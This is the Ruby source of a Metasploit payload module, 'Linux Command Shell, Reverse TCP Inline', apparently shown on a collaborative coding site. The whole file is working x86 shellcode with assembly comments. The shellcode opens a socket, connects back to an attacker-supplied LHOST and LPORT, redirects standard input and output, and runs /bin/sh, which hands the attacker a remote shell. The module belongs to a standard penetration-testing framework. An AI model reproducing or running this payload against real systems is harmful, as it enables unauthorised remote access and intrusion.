Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7
module MetasploitModule
8

9
  CachedSize = 68
10

11
  include Msf::Payload::Single
12
  include Msf::Payload::Linux
13
  include Msf::Sessions::CommandShellOptions
14

15
  def initialize(info = {})
16
    super(merge_info(info,
17
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
18
      'Description'   => 'Connect back to attacker and spawn a command shell',
19
      'Author'        => ['Ramon de C Valle', 'joev'],
20
      'License'       => MSF_LICENSE,
21
      'Platform'      => 'linux',
22
      'Arch'          => ARCH_X86,
23
      'Handler'       => Msf::Handler::ReverseTcp,
24
      'Session'       => Msf::Sessions::CommandShellUnix
25
    ))
26

27
    register_options([
28
      OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ])
29
    ])
30
  end
31

32
  def generate(_opts = {})
33
    # pad the shell path to a multiple of 4 with slashes
34
    shell = datastore['CMD']
35
    remainder = shell.bytes.length % 4
36
    if remainder == 0 then remainder = 4 end
37
    shell_padded = ("/" * (4-remainder)) + shell
38

39
    "\x31\xdb"             + #   xor ebx,ebx
40
    "\xf7\xe3"             + #   mul ebx
41
    "\x53"                 + #   push ebx
42
    "\x43"                 + #   inc ebx
43
    "\x53"                 + #   push ebx
44
    "\x6a\x02"             + #   push byte +0x2
45
    "\x89\xe1"             + #   mov ecx,esp
46
    "\xb0\x66"             + #   mov al,0x66 (sys_socketcall)
47
    "\xcd\x80"             + #   int 0x80
48
    "\x93"                 + #   xchg eax,ebx
49
    "\x59"                 + #   pop ecx
50
    "\xb0\x3f"             + #   mov al,0x3f (sys_dup2)
51
    "\xcd\x80"             + #   int 0x80
52
    "\x49"                 + #   dec ecx
53
    "\x79\xf9"             + #   jns 0x11
54
    "\x68" + [IPAddr.new(datastore['LHOST'], Socket::AF_INET).to_i].pack('N') + #   push ip addr
55
    "\x68\x02\x00" + [datastore['LPORT'].to_i].pack('S>') + #   push port
56
    "\x89\xe1"             + #   mov ecx,esp
57
    "\xb0\x66"             + #   mov al,0x66 (sys_socketcall)
58
    "\x50"                 + #   push eax
59
    "\x51"                 + #   push ecx
60
    "\x53"                 + #   push ebx
61
    "\xb3\x03"             + #   mov bl,0x3
62
    "\x89\xe1"             + #   mov ecx,esp
63
    "\xcd\x80"             + #   int 0x80
64
    "\x52"                 + #   push edx
65

66
    # Split shellname into 4-byte words and push them one-by-one
67
    # on to the stack
68
    shell_padded.bytes.reverse.each_slice(4).map do |word|
69
      "\x68" + word.reverse.pack('C*')
70
    end.join +
71

72
    "\x89\xe3"             + #   mov ebx,esp
73
    "\x52"                 + #   push edx
74
    "\x53"                 + #   push ebx
75
    "\x89\xe1"             + #   mov ecx,esp
76
    "\xb0\x0b"             + #   mov al,0xb (execve)
77
    "\xcd\x80"              #   int 0x80
78
  end
79
end
80

81